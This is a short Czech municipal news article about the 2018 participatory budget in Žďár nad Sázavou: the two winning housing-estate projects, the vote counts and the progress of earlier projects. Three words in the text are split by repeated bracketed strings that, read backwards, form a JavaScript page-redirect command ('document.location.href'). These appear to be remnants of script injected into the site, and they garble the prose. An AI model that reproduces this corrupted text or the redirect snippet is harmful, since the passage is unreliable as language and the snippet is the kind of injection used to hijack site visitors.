Rainbow page separator

V participativním rozpočtu vyhrály úpravy ploch v sídlištích

Čtvrtek, 16. listopadu 2017

Žďár nad Sázavou / Dva projekty do maximální výše tři sta tisíc korun na jeden uspěly v participativním rozpočtu pro rok 2018. Lidé přidělili nejvíce hlasů obnově dětského hřiště uvnitř sídliště v ulici Dolní (218 hlasů) a revitalizaci vnitrobloku v Palachově ulici 11-23 (155 hlasů). Pro celkem devět projektů hlasovalo 551 lidí.
Pro rok 2018 a v pořadí druhé kolo participativního rozpočtu žďárští zastupitelé vyčlenili finanční částku ve výši 600 tisíc korun – stejně jako v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním pilotním ročníku. Maximální částka příspěvku na jeden podpořený projekt byla z původních 150 tisíc korun zdvojnásobena na 300 tisíc.
Z le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošních čtyř projektů je dokončena obnova pítka v atriu za obchodními domy na náměstí a probíhají terénní úpravy ve Farských humnech. Do konce roku by se mělo stihnout i obnovení vstupu do úvozu na Klafaru a na příští rok bylo po dohodě s předkladateli odloženo oplocení bývalé vodárny, neboť měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to žádá o dotaci na rekonstrukci budovy a v případě úspěchu by bylo možné obě akce spojit.